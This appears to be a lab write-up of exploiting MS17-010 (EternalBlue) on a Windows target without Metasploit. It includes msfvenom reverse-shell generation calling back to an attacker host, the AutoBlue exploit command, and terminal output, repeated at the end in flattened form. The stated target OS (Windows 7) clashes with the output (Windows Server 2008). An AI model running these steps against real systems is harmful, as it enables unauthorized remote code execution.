Exploitation

This is without metasploit because anyways the Metasploit Module only supports 64-bit systems. We got a Windows 7 SP1 32-bit Based system.

Steps:

After cloning the github repo, go to the shellcode direcotry and generate the shellcode.

╭─      /home/k/I/r/192.168.100.40/exploit/AutoBlue-MS17-010/shellcode     master ?1 ▓▒░──░▒▓ ✔  root@kali 
╰─ ./shell_prep.sh          
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
192.168.49.227
LPORT you want x64 to listen on:
80
LPORT you want x86 to listen on:
80
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE

Notice the different shellcode generated.

ls
eternalblue_kshellcode_x64.asm  sc_all.bin         sc_x64_msf.bin     sc_x86_msf.bin
eternalblue_kshellcode_x86.asm  sc_x64.bin         sc_x86.bin         shell_prep.sh
eternalblue_sc_merge.py         sc_x64_kernel.bin  sc_x86_kernel.bin

The one we need is either

scx86.bin or sc_x86_msf.bin

Depending on whether we want to listen on the multi/handler or simple netcat. In my case I ran the exploit with the sc_x86.bin shellcode because I was only looking to use netcat to listen.

python3 eternalblue_exploit7.py 192.168.227.40 shellcode/sc_x86.bin
shellcode size: 962
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done

PreviousRPC

Last updated 2 years ago

╭─    /home/k/I/r/192.168.100.40/exploit/AutoBlue-MS17-010/shellcode    master ?1 ▓▒░──░▒▓ ✔  root@kali  ╰─ ./shell_prep.sh _.-;;-._ '-..-'| || | '-..-'|_.-;;-._| '-..-'| || | '-..-'|_.-''-._| Eternal Blue Windows Shellcode Compiler Let's compile them windoos shellcodezzz Compiling x64 kernel shellcode Compiling x86 kernel shellcode kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n) y LHOST for reverse connection: 192.168.49.227 LPORT you want x64 to listen on: 80 LPORT you want x86 to listen on: 80 Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell 1 Type 0 to generate a staged payload or 1 to generate a stageless payload 1 Generating x64 cmd shell (stageless)... msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Saved as: sc_x64_msf.bin Generating x86 cmd shell (stageless)... msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Saved as: sc_x86_msf.bin MERGING SHELLCODE WOOOO!!! DONE

ls eternalblue_kshellcode_x64.asm sc_all.bin sc_x64_msf.bin sc_x86_msf.bin eternalblue_kshellcode_x86.asm sc_x64.bin sc_x86.bin shell_prep.sh eternalblue_sc_merge.py sc_x64_kernel.bin sc_x86_kernel.bin

python3 eternalblue_exploit7.py 192.168.227.40 shellcode/sc_x86.bin shellcode size: 962 numGroomConn: 13 Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success good response status: INVALID_PARAMETER done